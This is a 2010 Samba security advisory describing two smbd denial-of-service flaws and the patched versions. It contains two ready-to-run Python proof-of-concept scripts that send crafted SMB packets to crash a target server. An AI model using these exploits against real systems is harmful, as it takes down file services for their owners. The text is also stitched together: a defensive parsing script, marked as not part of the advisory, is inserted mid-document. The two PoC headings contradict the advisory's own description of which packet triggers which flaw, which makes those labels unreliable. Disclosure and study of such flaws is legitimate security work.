Samba Denial Of Service

12 May 2010. Reported by Laurent Gaffié. Type: packetstorm. Source: packetstormsecurity.com

Samba DoS Vulnerabilities SS-2010-005, Laurent Gaffié

===============================================================================
stratsec Security Advisory: SS-2010-005  
===============================================================================  
  
Title: Samba Multiple DoS Vulnerabilities  
Version: 1.0  
Issue type: Multiple  
Affected vendor: Samba  
Release date: 12/05/2010  
Discovered by: Laurent Gaffié  
Issue status: Patch available  
  
===============================================================================  
  
Summary  
-------  
  
Two vulnerabilities were discovered in the Samba smbd daemon which allow an
attacker to trigger a null pointer dereference or an uninitialised variable
read by sending a specific 'Session Setup AndX' request. Successful
exploitation of either issue results in a denial of service.
  
Description  
-----------  
  
The Server Message Block (SMB) protocol, also known as the Common Internet File
System (CIFS), is an application-layer protocol that provides shared access to
files, printers and Inter-Process Communication (IPC). It is also a transport
for Distributed Computing Environment / Remote Procedure Call (DCE/RPC)
operations. Once the SMB dialect has been negotiated, the client sends a
'Session Setup AndX' request to establish a session, which it needs before it
can connect to a specific share.
  
To trigger the null pointer dereference, the client sends a crafted SMB
'Negotiate Protocol' request with the SMB header field 'Flags2' set to
'0x0003' (Unicode not set), followed by a 'Session Setup AndX' request with
'Flags2' set to '0x8003' (Unicode set). This sequence crashes the smbd
process.
  
The uninitialised variable read is triggered by a crafted 'Session Setup AndX'
request whose 'security blob length' field is set to '\xff\xff'.
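As an added illustration that is not part of the stratsec advisory, the following Python 3 code parses NetBIOS-framed SMB1 messages and applies the two conditions just described as a defender's consistency check: a Flags2 Unicode bit that changes between the Negotiate and the Session Setup AndX request, and a 'security blob length' larger than the data area that has to carry the blob. The helper names, the field offsets used (32-byte SMB1 header, WordCount, the 12-word extended-security Session Setup AndX form) and the sample frames are assumptions and constructions of this example, not the advisory's packets.

```python
import struct
SMB_MAGIC, FLAGS2_UNICODE = b"\xffSMB", 0x8000  # Flags2 bit 15: strings in this message are UTF-16
SMB_COM_NEGOTIATE, SMB_COM_SESSION_SETUP_ANDX = 0x72, 0x73

def parse_smb1(frame):
    """Split a NetBIOS-framed SMB1 message into header fields, words and data, checking every declared length."""
    if len(frame) < 39 or frame[0] != 0 or frame[4:8] != SMB_MAGIC:
        raise ValueError("not a NetBIOS-framed SMB1 message")
    body = frame[4:]
    if int.from_bytes(frame[1:4], "big") != len(body):
        raise ValueError("NetBIOS length does not match frame length")
    bc_off = 33 + 2 * body[32]  # WordCount at offset 32, then the words, then ByteCount
    data = body[bc_off + 2:]
    if len(body) < bc_off + 2 or struct.unpack_from("<H", body, bc_off)[0] != len(data):
        raise ValueError("WordCount/ByteCount do not match the bytes present")
    return {"command": body[4], "flags2": struct.unpack_from("<H", body, 10)[0],
            "word_count": body[32], "words": body[33:bc_off], "data": data}

def audit_session_setup(negotiate, session_setup):
    """Findings for a Negotiate / Session Setup AndX pair: Unicode flag flip, or blob length > data area."""
    neg, ss = parse_smb1(negotiate), parse_smb1(session_setup)
    if neg["command"] != SMB_COM_NEGOTIATE or ss["command"] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("expected Negotiate followed by Session Setup AndX")
    findings = []
    if (neg["flags2"] ^ ss["flags2"]) & FLAGS2_UNICODE:
        findings.append("unicode flag differs between Negotiate and Session Setup AndX")
    if ss["word_count"] == 12:  # extended-security form: word 7 is SecurityBlobLength
        blob_len = struct.unpack_from("<H", ss["words"], 14)[0]
        if blob_len > len(ss["data"]):  # the blob lives in the data area, so it cannot be longer
            findings.append(f"SecurityBlobLength {blob_len:#06x} exceeds ByteCount {len(ss['data'])}")
    return findings
# Constructed sample frames for the checks above (hypothetical helpers, not the advisory's packets).
def build_smb1(command, flags2, words, data):
    header = SMB_MAGIC + bytes([command]) + b"\0" * 4 + b"\x18" + struct.pack("<H", flags2) + b"\0" * 20
    body = header + bytes([len(words) // 2]) + words + struct.pack("<H", len(data)) + data
    return b"\0" + len(body).to_bytes(3, "big") + body

def session_setup_words(blob_len=None, pw_len=0):
    """12-word extended-security form (carries SecurityBlobLength) or 13-word NTLM form (password lengths)."""
    common = struct.pack("<BBHHHHI", 0xFF, 0, 0, 0x1104, 0x32, 0, 0)  # AndX, MaxBuffer, MaxMpx, VcNumber, SessionKey
    if blob_len is not None:
        return common + struct.pack("<H4sI", blob_len, b"\0" * 4, 0x800000D4)
    return common + struct.pack("<HH4sI", pw_len, pw_len, b"\0" * 4, 0xD4)
DIALECT, BLOB = b"\x02NT LM 0.12\x00", b"\x60\x06\x06\x04\x2b\x06\x01\x05"  # dialect list; opaque blob
NEG_UNICODE = build_smb1(SMB_COM_NEGOTIATE, 0xC853, b"", DIALECT)
NEG_ASCII = build_smb1(SMB_COM_NEGOTIATE, 0x0003, b"", DIALECT)
SS_OK = build_smb1(SMB_COM_SESSION_SETUP_ANDX, 0xC807, session_setup_words(len(BLOB)), BLOB + b"\0\0")
SS_OVERRUN = build_smb1(SMB_COM_SESSION_SETUP_ANDX, 0xC807, session_setup_words(0xFFFF), BLOB + b"\0\0")
SS_UNICODE = build_smb1(SMB_COM_SESSION_SETUP_ANDX, 0x8003, session_setup_words(pw_len=24), b"\0" * 48)
```

Run `audit_session_setup(NEG_UNICODE, SS_OVERRUN)` or `audit_session_setup(NEG_ASCII, SS_UNICODE)` to see each condition reported; a consistent pair returns an empty list.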
  
Impact  
------  
  
A remote attacker can cause a denial of service within the Samba daemon.
  
Affected products  
-----------------  
  
Samba <= 3.4.7 and Samba <= 3.5.1
  
Proof of concept  
----------------  
  
To trigger the uninitialised variable read issue, the following Python   
proof of concept is available:  
  
```python
import sys,socket
from socket import *

if len(sys.argv) <= 1:
    sys.exit('Usage: python smbd.py 10.0.0.12')

host = sys.argv[1], 445

# NetBIOS session header followed by the SMB 'Negotiate Protocol' request
packetnego = (
"\x00\x00\x00\xaa"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
)

# NetBIOS session header followed by the 'Session Setup AndX' request
payload = (
"\x00\x00\x01\xa3"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
"\x3f\x3f\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))
```
  
  
To trigger the null pointer dereference issue, the following Python proof of
concept is available:
  
```python
import sys,socket
from socket import *

if len(sys.argv) <= 1:
    sys.exit('python smbd.py 10.0.0.12')

host = sys.argv[1], 445

# NetBIOS session header followed by the SMB 'Negotiate Protocol' request
packetnego = (
"\x00\x00\x00\x85"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
"\x30\x2e\x31\x32\x00"
)

# NetBIOS session header followed by the 'Session Setup AndX' request
payload = (
"\x00\x00\x00\xec"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
"\xff\xff"  ## Security blob length set to \xff\xff here
"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))
```
  
Solution  
--------  
  
Update to version 3.5.2 or 3.4.8 (http://samba.org/).
  
Response timeline  
-----------------  
  
* 09/03/2010 - Null pointer dereference issue reported to vendor.
* 09/03/2010 - Vendor acknowledges receipt of the advisory 2 hours after
  receiving the initial email.
* 09/03/2010 - Vendor confirms the issue and provides a patch 3 hours after
  receiving the initial email.
* 09/03/2010 - stratsec confirms the patch resolves the issue.
* 15/03/2010 - Uninitialised variable read issue reported to vendor.
* 15/03/2010 - Vendor confirms the issue and provides a patch 5 hours after
  receiving the initial email.
* 15/03/2010 - stratsec confirms the patch resolves the issue.
* 07/04/2010 - Version 3.5.2 released by the vendor, fixing both issues.
* 11/05/2010 - Version 3.4.8 released by the vendor, fixing both issues.
* 12/05/2010 - This advisory published.
  
References  
----------  
* Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html
* https://bugzilla.samba.org/show_bug.cgi?id=7254
* stratsec would like to thank the Samba Security Team for their
  responsiveness while handling these issues.
  
===============================================================================  
  
About stratsec  
--------------  
stratsec specialises in providing information security consulting and testing
services for government and commercial clients. Established in 2004, we are
now one of the leading independent information security companies in the
Australasian and SE-Asian region, with offices throughout Australia and in
Singapore and Malaysia.
  
For more information, please visit our website at http://www.stratsec.net/   
  
===============================================================================  
  
